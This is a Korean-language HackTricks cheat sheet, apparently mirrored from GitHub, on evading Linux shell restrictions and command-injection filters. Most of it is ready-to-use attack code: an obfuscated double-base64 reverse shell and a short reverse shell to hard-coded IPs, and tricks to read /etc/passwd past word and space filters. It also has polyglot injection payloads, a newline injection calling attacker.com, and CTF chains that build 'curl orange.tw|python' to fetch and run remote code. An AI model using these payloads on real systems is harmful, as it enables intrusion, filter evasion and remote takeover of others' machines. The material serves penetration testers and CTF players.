mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-05 02:50:51 +00:00
359 lines
13 KiB
Markdown
359 lines
13 KiB
Markdown
# 리눅스 제한 우회
|
|
|
|
<details>
|
|
|
|
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 **제로부터 영웅이 되는 AWS 해킹을 배우세요**!</summary>
|
|
|
|
HackTricks를 지원하는 다른 방법:
|
|
|
|
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하고 싶다면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
|
|
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
|
|
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)를 **팔로우**하세요.
|
|
* **HackTricks** 및 **HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
|
|
|
|
</details>
|
|
|
|
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
\
|
|
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)를 사용하여 **세계에서 가장 고급** 커뮤니티 도구를 활용한 **워크플로우를 쉽게 구축하고 자동화**하세요.\
|
|
오늘 바로 액세스하세요:
|
|
|
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
|
|
|
## 일반적인 제한 우회
|
|
|
|
### 리버스 쉘
|
|
```bash
|
|
# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
|
|
echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
|
|
# echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
|
|
```
|
|
### 짧은 Rev 쉘
|
|
```bash
|
|
#Trick from Dikline
|
|
#Get a rev shell with
|
|
(sh)0>/dev/tcp/10.10.10.10/443
|
|
#Then get the out of the rev shell executing inside of it:
|
|
exec >&0
|
|
```
|
|
### 우회 경로 및 금지된 단어
|
|
```bash
|
|
# Question mark binary substitution
|
|
/usr/bin/p?ng # /usr/bin/ping
|
|
nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost
|
|
|
|
# Wildcard(*) binary substitution
|
|
/usr/bin/who*mi # /usr/bin/whoami
|
|
|
|
# Wildcard + local directory arguments
|
|
touch -- -la # -- stops processing options after the --
|
|
ls *
|
|
echo * #List current files and folders with echo and wildcard
|
|
|
|
# [chars]
|
|
/usr/bin/n[c] # /usr/bin/nc
|
|
|
|
# Quotes
|
|
'p'i'n'g # ping
|
|
"w"h"o"a"m"i # whoami
|
|
ech''o test # echo test
|
|
ech""o test # echo test
|
|
bas''e64 # base64
|
|
|
|
#Backslashes
|
|
\u\n\a\m\e \-\a # uname -a
|
|
/\b\i\n/////s\h
|
|
|
|
# $@
|
|
who$@ami #whoami
|
|
|
|
# Transformations (case, reverse, base64)
|
|
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case
|
|
$(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash)
|
|
$(rev<<<'imaohw') #whoami
|
|
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64
|
|
|
|
|
|
# Execution through $0
|
|
echo whoami|$0
|
|
|
|
# Uninitialized variables: A uninitialized variable equals to null (nothing)
|
|
cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
|
|
p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters
|
|
|
|
# Fake commands
|
|
p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown
|
|
w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown
|
|
|
|
# Concatenation of strings using history
|
|
!-1 # This will be substitute by the last command executed, and !-2 by the penultimate command
|
|
mi # This will throw an error
|
|
whoa # This will throw an error
|
|
!-1!-2 # This will execute whoami
|
|
```
|
|
### 금지된 공백 우회하기
|
|
```bash
|
|
# {form}
|
|
{cat,lol.txt} # cat lol.txt
|
|
{echo,test} # echo test
|
|
|
|
# IFS - Internal field separator, change " " for any other character ("]" in this case)
|
|
cat${IFS}/etc/passwd # cat /etc/passwd
|
|
cat$IFS/etc/passwd # cat /etc/passwd
|
|
|
|
# Put the command line in a variable and then execute it
|
|
IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
|
|
IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
|
|
IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice
|
|
# Other way, just change each space for ${IFS}
|
|
echo${IFS}test
|
|
|
|
# Using hex format
|
|
X=$'cat\x20/etc/passwd'&&$X
|
|
|
|
# Using tabs
|
|
echo "ls\x09-l" | bash
|
|
|
|
# New lines
|
|
p\
|
|
i\
|
|
n\
|
|
g # These 4 lines will equal to ping
|
|
|
|
# Undefined variables and !
|
|
$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
|
|
uname!-1\-a # This equals to uname -a
|
|
```
|
|
### 역슬래시 및 슬래시 우회
|
|
```bash
|
|
cat ${HOME:0:1}etc${HOME:0:1}passwd
|
|
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
|
|
```
|
|
### 파이프 우회
|
|
```bash
|
|
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
|
|
```
|
|
### 16진수 인코딩을 사용하여 우회하기
|
|
```bash
|
|
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
|
|
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
|
|
abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc
|
|
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
|
|
cat `xxd -r -p <<< 2f6574632f706173737764`
|
|
xxd -r -ps <(echo 2f6574632f706173737764)
|
|
cat `xxd -r -ps <(echo 2f6574632f706173737764)`
|
|
```
|
|
### IP 우회
|
|
```bash
|
|
# Decimal IPs
|
|
127.0.0.1 == 2130706433
|
|
```
|
|
### 시간 기반 데이터 유출
|
|
```bash
|
|
time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
|
|
```
|
|
### 환경 변수에서 문자 가져오기
|
|
```bash
|
|
echo ${LS_COLORS:10:1} #;
|
|
echo ${PATH:0:1} #/
|
|
```
|
|
### DNS 데이터 유출
|
|
|
|
예를 들어 **burpcollab** 또는 [**pingb**](http://pingb.in)를 사용할 수 있습니다.
|
|
|
|
### 내장 함수
|
|
|
|
외부 함수를 실행할 수 없고 **제한된 내장 함수만 사용하여 RCE를 얻을 수 있는 경우**, 이를 우회하기 위한 유용한 트릭이 있습니다. 일반적으로 **모든** **내장 함수를 사용할 수 없을 것**이므로, **모든 옵션을 알고** 감옥을 우회하려고 시도해야 합니다. [**devploit**](https://twitter.com/devploit)의 아이디어에서 나온 것입니다.\
|
|
먼저 모든 [**쉘 내장 함수**](https://www.gnu.org/software/bash/manual/html\_node/Shell-Builtin-Commands.html)**를 확인**하십시오. 그런 다음 여기에 몇 가지 **권장 사항**이 있습니다:
|
|
```bash
|
|
# Get list of builtins
|
|
declare builtins
|
|
|
|
# In these cases PATH won't be set, so you can try to set it
|
|
PATH="/bin" /bin/ls
|
|
export PATH="/bin"
|
|
declare PATH="/bin"
|
|
SHELL=/bin/bash
|
|
|
|
# Hex
|
|
$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
|
|
$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
|
|
|
|
# Input
|
|
read aaa; exec $aaa #Read more commands to execute and execute them
|
|
read aaa; eval $aaa
|
|
|
|
# Get "/" char using printf and env vars
|
|
printf %.1s "$PWD"
|
|
## Execute /bin/ls
|
|
$(printf %.1s "$PWD")bin$(printf %.1s "$PWD")ls
|
|
## To get several letters you can use a combination of printf and
|
|
declare
|
|
declare functions
|
|
declare historywords
|
|
|
|
# Read flag in current dir
|
|
source f*
|
|
flag.txt:1: command not found: CTF{asdasdasd}
|
|
|
|
# Read file with read
|
|
while read -r line; do echo $line; done < /etc/passwd
|
|
|
|
# Get env variables
|
|
declare
|
|
|
|
# Get history
|
|
history
|
|
declare history
|
|
declare historywords
|
|
|
|
# Disable special builtins chars so you can abuse them as scripts
|
|
[ #[: ']' expected
|
|
## Disable "[" as builtin and enable it as script
|
|
enable -n [
|
|
echo -e '#!/bin/bash\necho "hello!"' > /tmp/[
|
|
chmod +x [
|
|
export PATH=/tmp:$PATH
|
|
if [ "a" ]; then echo 1; fi # Will print hello!
|
|
```
|
|
### 다중언어 명령 삽입
|
|
```bash
|
|
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
|
|
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
|
|
```
|
|
### 잠재적인 정규 표현식 우회
|
|
```bash
|
|
# A regex that only allow letters and numbers might be vulnerable to new line characters
|
|
1%0a`curl http://attacker.com`
|
|
```
|
|
### Bashfuscator
|
|
```bash
|
|
# From https://github.com/Bashfuscator/Bashfuscator
|
|
./bashfuscator -c 'cat /etc/passwd'
|
|
```
|
|
### 5글자로 RCE 우회
|
|
```bash
|
|
# From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge
|
|
#Oragnge Tsai solution
|
|
## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date
|
|
http://host/?cmd=>ls\
|
|
http://host/?cmd=ls>_
|
|
http://host/?cmd=>\ \
|
|
http://host/?cmd=>-t\
|
|
http://host/?cmd=>\>g
|
|
http://host/?cmd=ls>>_
|
|
|
|
## Step2: generate `curl orange.tw|python` to file "g"
|
|
## by creating the necesary filenames and writting that content to file "g" executing the previous generated file
|
|
http://host/?cmd=>on
|
|
http://host/?cmd=>th\
|
|
http://host/?cmd=>py\
|
|
http://host/?cmd=>\|\
|
|
http://host/?cmd=>tw\
|
|
http://host/?cmd=>e.\
|
|
http://host/?cmd=>ng\
|
|
http://host/?cmd=>ra\
|
|
http://host/?cmd=>o\
|
|
http://host/?cmd=>\ \
|
|
http://host/?cmd=>rl\
|
|
http://host/?cmd=>cu\
|
|
http://host/?cmd=sh _
|
|
# Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file
|
|
|
|
## Finally execute the file "g"
|
|
http://host/?cmd=sh g
|
|
|
|
|
|
# Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
|
|
# Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*"
|
|
https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
|
|
## Execute tar command over a folder
|
|
http://52.199.204.34/?cmd=>tar
|
|
http://52.199.204.34/?cmd=>zcf
|
|
http://52.199.204.34/?cmd=>zzz
|
|
http://52.199.204.34/?cmd=*%20/h*
|
|
|
|
# Another curiosity if you can read files of the current folder
|
|
ln /f*
|
|
## If there is a file /flag.txt that will create a hard link
|
|
## to it in the current folder
|
|
```
|
|
### 4글자로 RCE 실행하기
|
|
```bash
|
|
# In a similar fashion to the previous bypass this one just need 4 chars to execute commands
|
|
# it will follow the same principle of creating the command `ls -t>g` in a file
|
|
# and then generate the full command in filenames
|
|
# generate "g> ht- sl" to file "v"
|
|
'>dir'
|
|
'>sl'
|
|
'>g\>'
|
|
'>ht-'
|
|
'*>v'
|
|
|
|
# reverse file "v" to file "x", content "ls -th >g"
|
|
'>rev'
|
|
'*v>x'
|
|
|
|
# generate "curl orange.tw|python;"
|
|
'>\;\\'
|
|
'>on\\'
|
|
'>th\\'
|
|
'>py\\'
|
|
'>\|\\'
|
|
'>tw\\'
|
|
'>e.\\'
|
|
'>ng\\'
|
|
'>ra\\'
|
|
'>o\\'
|
|
'>\ \\'
|
|
'>rl\\'
|
|
'>cu\\'
|
|
|
|
# got shell
|
|
'sh x'
|
|
'sh g'
|
|
```
|
|
## 읽기 전용/Noexec/Distroless 우회
|
|
|
|
만약 **읽기 전용 및 noexec 보호** 또는 distroless 컨테이너 내부에 있다면, 여전히 **임의의 이진 파일을 실행하는 방법이 있습니다. 심지어 셸을 실행할 수도 있습니다!:**
|
|
|
|
{% content-ref url="../bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/" %}
|
|
[bypass-fs-protections-read-only-no-exec-distroless](../bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/)
|
|
{% endcontent-ref %}
|
|
|
|
## Chroot 및 다른 감옥 우회
|
|
|
|
{% content-ref url="../privilege-escalation/escaping-from-limited-bash.md" %}
|
|
[escaping-from-limited-bash.md](../privilege-escalation/escaping-from-limited-bash.md)
|
|
{% endcontent-ref %}
|
|
|
|
## 참고 및 더 많은 정보
|
|
|
|
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits)
|
|
* [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet)
|
|
* [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0)
|
|
* [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/)
|
|
|
|
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
\
|
|
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks)를 사용하여 세계에서 **가장 고급** 커뮤니티 도구를 활용한 **워크플로우를 쉽게 구축하고 자동화**하세요.\
|
|
오늘 바로 액세스하세요:
|
|
|
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
|
|
|
<details>
|
|
|
|
<summary><strong>제로부터 영웅이 될 때까지 AWS 해킹을 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
HackTricks를 지원하는 다른 방법:
|
|
|
|
* **회사를 HackTricks에서 광고하거나 PDF로 다운로드하려면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
|
|
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 얻으세요
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
|
|
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)에 가입하거나 [텔레그램 그룹](https://t.me/peass)에 가입하거나** **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**를 팔로우하세요.**
|
|
* **HackTricks 및 HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유하세요.**
|
|
|
|
</details>
|